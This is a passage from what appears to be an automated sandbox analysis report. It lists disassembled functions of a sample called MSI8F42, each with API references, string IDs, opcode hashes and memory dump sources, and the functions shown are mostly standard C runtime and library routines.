                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocConcurrency::cancel_current_taskLocal
                                                                                                                                            • String ID: false$true
                                                                                                                                            • API String ID: 3924972193-2658103896
                                                                                                                                            • Opcode ID: eb169c8db4654a405d1fe4eb94d59b934dced8d2f29aa2ef17f25fceb27e3f67
                                                                                                                                            • Instruction ID: 9b1cfe84486f42ac54aa0a2a04131b0940b20fa065e762fc35d3435040748b22
                                                                                                                                            • Opcode Fuzzy Hash: eb169c8db4654a405d1fe4eb94d59b934dced8d2f29aa2ef17f25fceb27e3f67
                                                                                                                                            • Instruction Fuzzy Hash: 1361ADB1D0034C9BDB11DFA4C941BEEFBF8BF18704F14426AE945AB281E775AA44CB91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0030D501
                                                                                                                                            • _swprintf.LIBCMT ref: 0030D573
                                                                                                                                              • Part of subcall function 0030254E: __EH_prolog3.LIBCMT ref: 00302555
                                                                                                                                              • Part of subcall function 0030254E: std::_Lockit::_Lockit.LIBCPMT ref: 0030255F
                                                                                                                                              • Part of subcall function 0030254E: std::_Lockit::~_Lockit.LIBCPMT ref: 003025D0
                                                                                                                                              • Part of subcall function 00302FC8: __EH_prolog3.LIBCMT ref: 00302FCF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3Lockitstd::_$H_prolog3_Lockit::_Lockit::~__swprintf
                                                                                                                                            • String ID: 21$%.0Lf
                                                                                                                                            • API String ID: 3050236999-3009182331
                                                                                                                                            • Opcode ID: 2c25b0ef3c09907d30e04202ba7812c8fc452ea206c02003e80deebe0156d8be
                                                                                                                                            • Instruction ID: ccd443571afc4ad33c0515cddee730341e15ab334e5666ed8e2b02fe2774cbec
                                                                                                                                            • Opcode Fuzzy Hash: 2c25b0ef3c09907d30e04202ba7812c8fc452ea206c02003e80deebe0156d8be
                                                                                                                                            • Instruction Fuzzy Hash: 4E414A71D01308ABCF06DFE0CC55AEDBBB9FB09304F204459E846AB295DB359915CF90
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0030D7A5
                                                                                                                                            • _swprintf.LIBCMT ref: 0030D817
                                                                                                                                              • Part of subcall function 002F8610: std::_Lockit::_Lockit.LIBCPMT ref: 002F8657
                                                                                                                                              • Part of subcall function 002F8610: std::_Lockit::_Lockit.LIBCPMT ref: 002F8679
                                                                                                                                              • Part of subcall function 002F8610: std::_Lockit::~_Lockit.LIBCPMT ref: 002F86A1
                                                                                                                                              • Part of subcall function 002F8610: std::_Lockit::~_Lockit.LIBCPMT ref: 002F880E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                                                                                            • String ID: 21$%.0Lf
                                                                                                                                            • API String ID: 1487807907-3009182331
                                                                                                                                            • Opcode ID: bf7e9730da38a83484bf154e8314aa7ca8c53e9e36de9d2e5f7c6e348e0dc0dd
                                                                                                                                            • Instruction ID: 42557b34ad22fe5c594c7c0d615e117a94e2cfe2f03e183e5698853de973654b
                                                                                                                                            • Opcode Fuzzy Hash: bf7e9730da38a83484bf154e8314aa7ca8c53e9e36de9d2e5f7c6e348e0dc0dd
                                                                                                                                            • Instruction Fuzzy Hash: 11417B71D10308ABCF06DFE0D855AEDBBB9FF08340F208459E945AB295EB359915CF90
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0031188E
                                                                                                                                            • _swprintf.LIBCMT ref: 00311900
                                                                                                                                              • Part of subcall function 002F9270: std::_Lockit::_Lockit.LIBCPMT ref: 002F92A0
                                                                                                                                              • Part of subcall function 002F9270: std::_Lockit::_Lockit.LIBCPMT ref: 002F92C2
                                                                                                                                              • Part of subcall function 002F9270: std::_Lockit::~_Lockit.LIBCPMT ref: 002F92EA
                                                                                                                                              • Part of subcall function 002F9270: std::_Lockit::~_Lockit.LIBCPMT ref: 002F9422
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                                                                                            • String ID: 21$%.0Lf
                                                                                                                                            • API String ID: 1487807907-3009182331
                                                                                                                                            • Opcode ID: b7fff9219242b032155a7019f4cf6c8f9c47e7b3309031501e87724f80531e7e
                                                                                                                                            • Instruction ID: db3b6f11e9acdcdb01c6dc5d79eb60cd7754bfa2ceb6a6fe4332cc590146fb86
                                                                                                                                            • Opcode Fuzzy Hash: b7fff9219242b032155a7019f4cf6c8f9c47e7b3309031501e87724f80531e7e
                                                                                                                                            • Instruction Fuzzy Hash: 84416A71E1020CABCF0AEFE4C854AEDBBB9FF08340F208459E955AB291DB359955CF90
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030838D
                                                                                                                                              • Part of subcall function 00301C42: _Maklocstr.LIBCPMT ref: 00301C62
                                                                                                                                              • Part of subcall function 00301C42: _Maklocstr.LIBCPMT ref: 00301C7F
                                                                                                                                              • Part of subcall function 00301C42: _Maklocstr.LIBCPMT ref: 00301C9C
                                                                                                                                              • Part of subcall function 00301C42: _Maklocchr.LIBCPMT ref: 00301CAE
                                                                                                                                              • Part of subcall function 00301C42: _Maklocchr.LIBCPMT ref: 00301CC1
                                                                                                                                            • _Mpunct.LIBCPMT ref: 0030841A
                                                                                                                                            • _Mpunct.LIBCPMT ref: 00308434
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                                                            • String ID: $+xv
                                                                                                                                            • API String ID: 2939335142-1686923651
                                                                                                                                            • Opcode ID: 6424bdb94ebdcdef727f04088a332d6ef9ab491d6295839bd5e363e3a4346b48
                                                                                                                                            • Instruction ID: fb961716b4e9ee58b5be6a1ea6ededd6ca72f7423eef53fac33eae46d597f52c
                                                                                                                                            • Opcode Fuzzy Hash: 6424bdb94ebdcdef727f04088a332d6ef9ab491d6295839bd5e363e3a4346b48
                                                                                                                                            • Instruction Fuzzy Hash: 202177B1904B566FD726DF75C49077BBEF8AB0C700F04495AE499C7A82D734D641CB90
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Mpunct$H_prolog3
                                                                                                                                            • String ID: $+xv
                                                                                                                                            • API String ID: 4281374311-1686923651
                                                                                                                                            • Opcode ID: 6ac58a0874ebd4183de7a72e4373168dc66a8d41bedbcf12d888f1a8bd098585
                                                                                                                                            • Instruction ID: 75eafd9a89a011beb77fcdbc1e1fc9b4497eed76d8b05f32e33551d969e7cddf
                                                                                                                                            • Opcode Fuzzy Hash: 6ac58a0874ebd4183de7a72e4373168dc66a8d41bedbcf12d888f1a8bd098585
                                                                                                                                            • Instruction Fuzzy Hash: 9021B6B1904B516FD72ADF75C49077BBEF8AB0C300F04491AE099CBA42D774E641CB90
                                                                                                                                            APIs
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,002F1434,?,00000000), ref: 002F2569
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,002F1434,?,00000000), ref: 002F2589
                                                                                                                                            • LocalFree.KERNEL32(?,002F1434,?,00000000), ref: 002F25DF
                                                                                                                                            • CloseHandle.KERNEL32(00000000,7642E7B1,?,00000000,00333C40,000000FF,00000008,?,?,?,?,002F1434,?,00000000), ref: 002F2633
                                                                                                                                            • LocalFree.KERNEL32(?,7642E7B1,?,00000000,00333C40,000000FF,00000008,?,?,?,?,002F1434), ref: 002F2647
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Local$AllocFree$CloseHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1291444452-0
                                                                                                                                            • Opcode ID: 4f94a25fbc5cd0767409fe344ad407b173957265510b3b676b90798c1ce3fc9e
                                                                                                                                            • Instruction ID: 50e1c3da51900a394ce69e892a32d4539c7d5dc5508e20ed5162fef736487f20
                                                                                                                                            • Opcode Fuzzy Hash: 4f94a25fbc5cd0767409fe344ad407b173957265510b3b676b90798c1ce3fc9e
                                                                                                                                            • Instruction Fuzzy Hash: CE41E972610219DBC7199F68D894ABAF7DCEB4A3A0F504639F626C72D0DB70D8588750
                                                                                                                                            APIs
                                                                                                                                            • LocalFree.KERNEL32(002F9C9B), ref: 002FACD1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeLocal
                                                                                                                                            • String ID: @T4$@T4$T4
                                                                                                                                            • API String ID: 2826327444-2191613505
                                                                                                                                            • Opcode ID: 75a45c7af7c9762fce773fa872b6d6ad5aa345836dc432be7440565a6ebc4b96
                                                                                                                                            • Instruction ID: 83e2e79e7dc7eb7413df9fd4b14d5e3963f44459ed06db75985529c512715276
                                                                                                                                            • Opcode Fuzzy Hash: 75a45c7af7c9762fce773fa872b6d6ad5aa345836dc432be7440565a6ebc4b96
                                                                                                                                            • Instruction Fuzzy Hash: 4DE19CB1A1024EDFDF14CFA8C884AEEFBB9FF08344F144069E919AB251D770A955CB61
                                                                                                                                            APIs
                                                                                                                                            • GetConsoleOutputCP.KERNEL32(7642E7B1,?,00000000,?), ref: 00331DFE
                                                                                                                                              • Part of subcall function 0032A9BB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00326F5E,?,00000000,-00000008), ref: 0032AA67
                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00332059
                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 003320A1
                                                                                                                                            • GetLastError.KERNEL32 ref: 00332144
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2112829910-0
                                                                                                                                            • Opcode ID: 9bfb685b2d523cbb12eecdd7d5cf794f39ee867e70865304f712ff6e8c3f0e4f
                                                                                                                                            • Instruction ID: 70c51e91400760271fb430b4176c6181dc807cb7d78478a023741ae3cd91c6b2
                                                                                                                                            • Opcode Fuzzy Hash: 9bfb685b2d523cbb12eecdd7d5cf794f39ee867e70865304f712ff6e8c3f0e4f
                                                                                                                                            • Instruction Fuzzy Hash: 62D157B5D04258AFCB16CFA8D8C09EEBBB9FF09310F18456AE915EB351D730A945CB50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: cf32bb642c29218b67576a80e6df929616759348e9be1f7fa79397be9643a0d7
                                                                                                                                            • Instruction ID: 77d50dc67a382f63f05bc44539a117e847065a7903d94382e5b5be684f7716cf
                                                                                                                                            • Opcode Fuzzy Hash: cf32bb642c29218b67576a80e6df929616759348e9be1f7fa79397be9643a0d7
                                                                                                                                            • Instruction Fuzzy Hash: 8621D472604225BF9B27AF61EC61C6BB7ACBF463607228915F8158B250D730ED4097A0
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,7642E7B1), ref: 002FCD1C
                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 002FCD3C
                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 002FCD6D
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 002FCD86
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3604237281-0
                                                                                                                                            • Opcode ID: a63386174baa362dcdd5123ae6607dc3fec95ded39edf01f1e8e72c2be90b842
                                                                                                                                            • Instruction ID: 6b4149903175060e088a3ad7b9a5513eaf1ce5aab00b0699be6ade3a2ae27a9f
                                                                                                                                            • Opcode Fuzzy Hash: a63386174baa362dcdd5123ae6607dc3fec95ded39edf01f1e8e72c2be90b842
                                                                                                                                            • Instruction Fuzzy Hash: 4C21B1B4941719ABD7258F54DD4AFAEBBBCEB05B14F200629F600AB2C0D7B46A0587E4
                                                                                                                                            APIs
                                                                                                                                            • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00333053,?,00000001,?,?,?,00332198,?,?,00000000), ref: 0033369D
                                                                                                                                            • GetLastError.KERNEL32(?,00333053,?,00000001,?,?,?,00332198,?,?,00000000,?,?,?,0033271F,?), ref: 003336A9
                                                                                                                                              • Part of subcall function 0033366F: CloseHandle.KERNEL32(FFFFFFFE,003336B9,?,00333053,?,00000001,?,?,?,00332198,?,?,00000000,?,?), ref: 0033367F
                                                                                                                                            • ___initconout.LIBCMT ref: 003336B9
                                                                                                                                              • Part of subcall function 00333631: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00333660,00333040,?,?,00332198,?,?,00000000,?), ref: 00333644
                                                                                                                                            • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00333053,?,00000001,?,?,?,00332198,?,?,00000000,?), ref: 003336CE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3_ctype
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2548254987-1316489359
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3_ctype
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2548254987-1316489359
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3_Initstd::locale::_
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 3382595777-1316489359
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3_Initstd::locale::_
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 3382595777-1316489359
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3_Initstd::locale::_
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 3382595777-1316489359
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3_Initstd::locale::_
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 3382595777-1316489359
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __aulldiv
                                                                                                                                            • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                                                                            • API String ID: 3732870572-1956417402
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 002FBF6E
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                                                                            • String ID: false$true
                                                                                                                                            • API String ID: 118556049-2658103896
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: \\?\$\\?\UNC\
                                                                                                                                            • API String ID: 0-3019864461
                                                                                                                                            • Opcode ID: f4abdb02af1738c431e8bee76b3425b39d83e28bd61a9c34749c744e0607304a
                                                                                                                                            • Instruction ID: d21e9ba9f53e555bc82bcd1ea19e8975fb2f34ff9c54861319aafe67f87d627a
                                                                                                                                            • Opcode Fuzzy Hash: f4abdb02af1738c431e8bee76b3425b39d83e28bd61a9c34749c744e0607304a
                                                                                                                                            • Instruction Fuzzy Hash: EB510370A24209DBDB15CF64C845BFEF7B9FF58384F10452DE901AB280DBB56998CB90
                                                                                                                                            APIs
                                                                                                                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0031607E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EncodePointer
                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                            • API String ID: 2118026453-2084237596
                                                                                                                                            • Opcode ID: bacfe561ccb3ad79691d37ca3ee0ee2a08cc0f404c2a95d5bf9047f0218c8556
                                                                                                                                            • Instruction ID: 3bf2d920ba06dc66712ab43c96afa69f9da5d4b10d275a02468b97f50418f65d
                                                                                                                                            • Opcode Fuzzy Hash: bacfe561ccb3ad79691d37ca3ee0ee2a08cc0f404c2a95d5bf9047f0218c8556
                                                                                                                                            • Instruction Fuzzy Hash: E4413A71900209EFCF1ADF98CC82AEEBBB5BF4C304F1541A9F90467252D3759A91DB50
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3___cftoe
                                                                                                                                            • String ID: !%x
                                                                                                                                            • API String ID: 855520168-1893981228
                                                                                                                                            • Opcode ID: bdb4d172f4f64a842ca575c33680dcbead7c5f16cf4480f603e7fb4ea9b43b53
                                                                                                                                            • Instruction ID: 1fe96bbc331cdb64975a0f0b2573597ab78fb73b15e434b83eb9845607a7ead2
                                                                                                                                            • Opcode Fuzzy Hash: bdb4d172f4f64a842ca575c33680dcbead7c5f16cf4480f603e7fb4ea9b43b53
                                                                                                                                            • Instruction Fuzzy Hash: 5E318B71D1120DEBDF05DF94E991AEEB7B5FF08304F104819F504AB281D775AA55CB60
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3___cftoe
                                                                                                                                            • String ID: !%x
                                                                                                                                            • API String ID: 855520168-1893981228
                                                                                                                                            • Opcode ID: e5c8fb77be072f22461b98c4297cae169e29337d4d604028fccc74d79c43b819
                                                                                                                                            • Instruction ID: 903a5d35ebbaddd12ab019b7cad308a8a355949c14bf168ea64fa169de0d0262
                                                                                                                                            • Opcode Fuzzy Hash: e5c8fb77be072f22461b98c4297cae169e29337d4d604028fccc74d79c43b819
                                                                                                                                            • Instruction Fuzzy Hash: E1318E31D1525DAFDF06DF94E881AEEBBB9EF09300F140019F944A7242D7759A85CFA0
                                                                                                                                            APIs
                                                                                                                                            • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 002F5F86
                                                                                                                                            • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,7642E7B1), ref: 002F5FF6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
